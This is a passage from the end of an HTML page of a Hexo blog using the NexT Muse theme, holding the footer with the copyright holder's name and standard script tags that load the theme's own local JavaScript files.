    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Narcher Alter</span>
</div>
<!--
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
